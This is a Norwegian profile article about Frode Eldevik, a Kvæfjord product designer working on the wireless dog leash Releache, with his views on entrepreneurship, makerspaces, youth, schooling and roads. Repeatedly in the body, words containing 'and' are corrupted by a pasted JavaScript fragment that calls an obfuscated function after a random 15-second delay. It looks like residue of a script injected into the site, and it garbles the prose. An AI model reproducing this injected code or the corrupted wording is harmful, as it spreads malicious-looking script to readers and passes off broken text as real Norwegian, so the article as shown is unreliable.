Ingenting gjør seg selv

Frode Eldevik

Frode Eldevik er på mange måter Kvæfjord kommunes «Petter Smart», en mann som brenner for gründervirksomhet, skaperkraft og innovasjon.

Frode er utdannet produkt- og industridesigner og bidrar med alt fra rask visualisering til lansering av produkter. Han var landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andets aller første leverandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andør av 3D-printere og sto for  import, salg og opplæring. 3D-printere er et unikt verktøy for å teste ut og visualisere produkter, og selv har han hatt stor nytte av 3D-print i arbeidet med utviklingen av verdens første og eneste trådløse hundebånd. Jeg bruker nå all min tid på utviklingen av hundebåndet Releache, og vi er inne i siste fase i testingen av produktet, sier Frode Eldevik.

Eldevik vet at det og være gründer er hardt arbeid og at det krever tålmodighet og kapital. Jeg har alltid likt å test og prøve ut ting, se om det fantes bedre løsninger på det jeg holdt på med. Siden jeg er oppvokst på Borkenes hadde jeg lyst og etablere meg her. Jeg trives med naturen og muligheten til å kunne gå ut og plukke blåbær til frokostbordet, jeg liker rett og slett tanken på at jeg kan være selvberget om jeg ønsker det. I tillegg til min jobb elsker jeg å klatre, kite, gå i fjellet og selvsagt tilbringe tid med familien min. For meg ble Kvæfjord det naturlige valget, her lever jeg det gode liv, men har hele verden som mitt marked.

Fokus på skaperkraft

Det er for mange som forventer å komme til dekket bord, derfor har Norge en vei å gå hva gjelder skaperkraft ifølge Frode. Jeg tror det er viktig å starte allerede på barneskolen å lære ungene gleden med det og skape, prøve, feile og se en ideer bli virkelig. Ingen ting gjør seg selv, og har man et ønske om å få til noe, ja da er det bare og brette opp armene og gå i gang. Vi må lære barn og unge at alt har en start, og vise dem at også internasjonale merkevarer som Apple startet i det små, men alt er mulig, sier en engasjert Frode. Det og komme sammen med andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre «makere» er veldig viktig. Det og ha en møteplass hvor du treffer mennesker som har tro på det du holder på med, kan gi råd, veiledning og innspill underveis i utviklingsprosessen er gull verdt. Med dette som bakteppe har Frode Eldevik vært en av drivkreftene for etableringen av Harstad Makers. Dette er et fysisk møtested for folk som liker å skape, og som kommer sammen for å dele kunnskap, ideer, prøve og feile.

Jeg tror regionen bør ha fokus på innovasjon og skaperkraft, og i større grad legge til rette for de som ønsker å utvikle produkter og tjenester for fremtiden, sier Frode. Det og være gründer er å ta ansvar, men det kan ikke være slik at man skal sette hus og hjem på spill mens man jobber frem mot den rette løsningen. Det må bli attraktivt for flere å påta seg ansvaret med å skape, pr. i dag er vi ikke der, og mange gründere ser seg nødt til å legge inn årene grunnet økonomi og mangelen på investorer.

Gode oppvekstsvilkår gir gode minner

For at de unge skal komme tilbake til regionen etter endt utdanning må vi ha gode arbeidsplasser og tilby, så dette må være fokusområde nr. 1, ifølge Frode Eldevik. Videre sier han det er viktig at regionen samler seg om lokalisering og etablering av videregående utdanningstilbud. Skoletilbud er viktig for alle lokalsamfunn, og slik jeg ser det er det naturlig at jordbrukskommunen Kvæfjord tilbyr naturbruk, samt restaurant og matfag, sier Frode. En felles strategi og plan for å gi de unge muligheten til å ta sin vg. utdanning i regionen er et viktig ledd i arbeidet med og beholde ungdommen i vår region. Jo tidligere de unge flytter fra landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andsdelen, jo vanskeligere tror jeg det blir å hente de tilbake. En god oppvekst gir gode minner, og det er disse minnene som hentes frem når man som voksen skal beslutte hvor man ønsker å etablere seg, derfor er en god skolegang og et godt fritidstilbud viktige for fremtidig rekruttering av arbeidskraft til kommunen, sier Frode .

Samferdsel

Vi kommer ikke utenom samferdsel og behovet for gode veier. I perioden hvor Frode jobbet like mye sørpå som i egen region var han stadig på farta til Evenes flyplass. Den dårlige veien over Storjorda var til stor frustrasjon og er det fremdeles. Skal vi få mennesker til å etablere seg i kommunen vår, og i regionen forøvrig, må vi kunne tilby gode veier og kortere avstandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ander til samferdselsknutepunkt, mener han. I dag hvor du kan sitte hvor som helst og jobbe bare du har nettverk, så betyr det at man farter mer. Dårlig veistandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andard og lange avstandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ander er et område som gjør oss mindre attraktive når næringsliv og privatpersoner tenker etablering, avslutter Frode Eldevik.

Eldevik Industridesign AS
Eier og daglig leder, Frode Eldevik (eneste ansatt)
Produktutvikling og design, innovasjonsprosesser
Etablert 2012
Kvæfjord kommune